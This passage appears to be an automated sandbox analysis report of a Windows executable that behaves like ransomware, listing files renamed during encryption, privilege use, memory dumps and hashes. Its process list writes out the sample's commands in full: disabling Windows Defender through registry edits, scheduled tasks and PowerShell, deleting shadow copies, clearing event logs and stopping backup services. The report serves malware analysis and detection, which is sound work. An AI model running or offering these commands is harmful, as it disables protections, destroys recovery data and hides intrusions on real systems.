| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\jce.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_h_P3hHh55lc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\README.TXT.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_2AYuo4OFmgw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.common.16.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_i34hTHRddwk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL107.XML.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_DbbBGl8Mznk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_MoveNoDrop32x32.gif.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_qq2dQt6v90Q0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\management\snmp.acl.template.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_TbhbsurI0280.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_OEM_Perp-pl.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_46jjTW_3O680.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_kZVkxwKDDwI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Grace-ppd.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_1XKlntuGei40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"
C:\Windows\SysWOW64\net.exe
net.exe stop "SamSs" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "vmicvss" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "VSS" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "wbengine" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "WebClient" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SysWOW64\net.exe
net.exe stop "UnistoreSvc_12cea" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12cea" /y
C:\Windows\SysWOW64\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SysWOW64\sc.exe
sc.exe config "UnistoreSvc_12cea" start= disabled
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 52.109.12.20:443 | tcp | |
| US | 52.109.12.20:443 | tcp |
Files
memory/2640-115-0x0000000000000000-mapping.dmp
memory/4240-116-0x0000000000000000-mapping.dmp
memory/4076-117-0x0000000000000000-mapping.dmp
memory/2008-118-0x0000000000000000-mapping.dmp
memory/4256-119-0x0000000000000000-mapping.dmp
memory/4288-120-0x0000000000000000-mapping.dmp
memory/4272-121-0x0000000000000000-mapping.dmp
memory/4404-122-0x0000000000000000-mapping.dmp
memory/4384-123-0x0000000000000000-mapping.dmp
memory/4464-124-0x0000000000000000-mapping.dmp
memory/4444-125-0x0000000000000000-mapping.dmp
memory/4344-126-0x0000000000000000-mapping.dmp
memory/4324-127-0x0000000000000000-mapping.dmp
memory/4420-128-0x0000000000000000-mapping.dmp
memory/3800-129-0x0000000000000000-mapping.dmp
memory/4308-130-0x0000000000000000-mapping.dmp
memory/3076-131-0x0000000000000000-mapping.dmp
memory/512-132-0x0000000000000000-mapping.dmp
memory/652-133-0x0000000000000000-mapping.dmp
memory/3260-134-0x0000000000000000-mapping.dmp
memory/1032-135-0x0000000000000000-mapping.dmp
memory/1244-136-0x0000000000000000-mapping.dmp
memory/1508-137-0x0000000000000000-mapping.dmp
memory/1784-138-0x0000000000000000-mapping.dmp
memory/1284-139-0x0000000000000000-mapping.dmp
memory/2348-140-0x0000000000000000-mapping.dmp
memory/2584-141-0x0000000000000000-mapping.dmp
memory/2768-142-0x0000000000000000-mapping.dmp
memory/3156-143-0x0000000000000000-mapping.dmp
memory/3244-144-0x0000000000000000-mapping.dmp
memory/4836-145-0x0000000000000000-mapping.dmp
memory/1148-146-0x0000000000000000-mapping.dmp
memory/4976-147-0x0000000000000000-mapping.dmp
memory/2000-148-0x0000000000000000-mapping.dmp
memory/4960-149-0x0000000000000000-mapping.dmp
memory/4864-150-0x0000000000000000-mapping.dmp
memory/4580-151-0x0000000000000000-mapping.dmp
memory/3196-152-0x0000000000000000-mapping.dmp
memory/4912-153-0x0000000000000000-mapping.dmp
memory/2688-154-0x0000000000000000-mapping.dmp
memory/1060-155-0x0000000000000000-mapping.dmp
memory/884-156-0x0000000000000000-mapping.dmp
memory/1044-157-0x0000000000000000-mapping.dmp
memory/2496-158-0x0000000000000000-mapping.dmp
memory/4788-159-0x0000000000000000-mapping.dmp
memory/924-160-0x0000000000000000-mapping.dmp
memory/2544-161-0x0000000000000000-mapping.dmp
memory/1340-162-0x0000000000000000-mapping.dmp
memory/1516-163-0x0000000000000000-mapping.dmp
memory/1776-164-0x0000000000000000-mapping.dmp
memory/2172-165-0x0000000000000000-mapping.dmp
memory/2020-166-0x0000000000000000-mapping.dmp
memory/2292-167-0x0000000000000000-mapping.dmp
memory/3112-168-0x0000000000000000-mapping.dmp
memory/3836-169-0x0000000000000000-mapping.dmp
memory/1616-170-0x0000000000000000-mapping.dmp
memory/1564-171-0x0000000000000000-mapping.dmp
memory/3844-172-0x0000000000000000-mapping.dmp
memory/1864-173-0x0000000000000000-mapping.dmp
memory/4372-174-0x0000000000000000-mapping.dmp
memory/2192-175-0x0000000000000000-mapping.dmp
memory/4000-176-0x0000000000000000-mapping.dmp
memory/4040-177-0x0000000000000000-mapping.dmp
memory/4092-178-0x0000000000000000-mapping.dmp
memory/3280-179-0x0000000003270000-0x0000000003271000-memory.dmp
memory/3280-180-0x0000000003270000-0x0000000003271000-memory.dmp
memory/3280-181-0x0000000006FE0000-0x0000000007016000-memory.dmp
memory/3280-182-0x0000000004C70000-0x0000000004C71000-memory.dmp
memory/3280-183-0x0000000007650000-0x0000000007C78000-memory.dmp
memory/3280-184-0x00000000075F0000-0x0000000007612000-memory.dmp
memory/3280-185-0x0000000007DF0000-0x0000000007E56000-memory.dmp
memory/3280-186-0x0000000008040000-0x00000000080A6000-memory.dmp
memory/3280-187-0x00000000080E0000-0x0000000008430000-memory.dmp
memory/3280-188-0x0000000004C72000-0x0000000004C73000-memory.dmp
memory/3280-189-0x0000000007F20000-0x0000000007F3C000-memory.dmp
memory/3280-190-0x00000000088C0000-0x000000000890B000-memory.dmp
memory/3280-191-0x0000000008750000-0x00000000087C6000-memory.dmp
memory/3280-192-0x0000000003270000-0x0000000003271000-memory.dmp
memory/3280-200-0x0000000007650000-0x0000000007C78000-memory.dmp
memory/3280-201-0x0000000009840000-0x0000000009873000-memory.dmp
memory/3280-203-0x0000000009840000-0x0000000009873000-memory.dmp
memory/3280-202-0x000000007F120000-0x000000007F121000-memory.dmp
memory/3280-205-0x0000000007DF0000-0x0000000007E56000-memory.dmp
memory/3280-204-0x00000000075F0000-0x0000000007612000-memory.dmp
memory/3280-206-0x0000000008040000-0x00000000080A6000-memory.dmp
memory/3280-208-0x0000000008750000-0x00000000087C6000-memory.dmp
memory/3280-207-0x00000000088C0000-0x000000000890B000-memory.dmp
memory/3280-209-0x0000000009610000-0x000000000962E000-memory.dmp
memory/3280-214-0x0000000009880000-0x0000000009925000-memory.dmp
memory/3280-215-0x0000000009B30000-0x0000000009BC4000-memory.dmp
memory/3280-222-0x0000000004C73000-0x0000000004C74000-memory.dmp
memory/3280-409-0x0000000009AE0000-0x0000000009AFA000-memory.dmp
memory/3280-414-0x0000000009AE0000-0x0000000009AFA000-memory.dmp
memory/3280-415-0x0000000009AD0000-0x0000000009AD8000-memory.dmp
memory/3280-420-0x0000000009AD0000-0x0000000009AD8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 1c19c16e21c97ed42d5beabc93391fc5 |
| SHA1 | 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68 |
| SHA256 | 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05 |
| SHA512 | 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c |
memory/2148-433-0x00000000071D0000-0x0000000007206000-memory.dmp
memory/2148-434-0x0000000007840000-0x0000000007E68000-memory.dmp
memory/2148-435-0x0000000004E50000-0x0000000004E51000-memory.dmp
memory/2148-436-0x0000000004E52000-0x0000000004E53000-memory.dmp
memory/2148-437-0x0000000007F70000-0x0000000007F92000-memory.dmp
memory/2148-438-0x0000000008250000-0x00000000082B6000-memory.dmp
memory/2148-439-0x0000000008070000-0x00000000080D6000-memory.dmp
memory/2148-440-0x00000000082C0000-0x0000000008610000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4dead21eadbf49fd5eb9883f0504c894 |
| SHA1 | b39d0806a2de4fa89d2e50394bcd9e02e7bebd5f |
| SHA256 | 1b526fe2bcaad9a0794d2ed8069bf860d0ac9d6184f17ef59dd41893eb4031da |
| SHA512 | e48b5b353ac29099090653a9770592e9bbb8d7eece0125ddf47f939812bcdd1fc7e98b84825de15fd01ed3713a8b966489657a6a83857a32a3f94f60374ef56a |
memory/2148-442-0x00000000086D0000-0x00000000086EC000-memory.dmp
memory/2148-443-0x0000000008B20000-0x0000000008B6B000-memory.dmp
memory/2148-444-0x00000000089C0000-0x0000000008A36000-memory.dmp
memory/2148-453-0x0000000007840000-0x0000000007E68000-memory.dmp
memory/2148-454-0x0000000009AA0000-0x0000000009AD3000-memory.dmp
memory/2148-456-0x0000000007F70000-0x0000000007F92000-memory.dmp
memory/2148-455-0x0000000009AA0000-0x0000000009AD3000-memory.dmp
memory/2148-457-0x0000000008250000-0x00000000082B6000-memory.dmp
memory/2148-458-0x0000000008070000-0x00000000080D6000-memory.dmp
memory/2148-460-0x00000000089C0000-0x0000000008A36000-memory.dmp
memory/2148-459-0x0000000008B20000-0x0000000008B6B000-memory.dmp
memory/2148-461-0x0000000009880000-0x000000000989E000-memory.dmp
memory/2148-466-0x0000000009AF0000-0x0000000009B95000-memory.dmp
memory/2148-467-0x000000007F4D0000-0x000000007F4D1000-memory.dmp
memory/2148-468-0x0000000009DA0000-0x0000000009E34000-memory.dmp
memory/2148-539-0x0000000004E53000-0x0000000004E54000-memory.dmp
memory/2148-662-0x0000000009D70000-0x0000000009D8A000-memory.dmp
memory/2148-667-0x0000000009D70000-0x0000000009D8A000-memory.dmp
memory/2148-668-0x0000000009D60000-0x0000000009D68000-memory.dmp
memory/2148-673-0x0000000009D60000-0x0000000009D68000-memory.dmp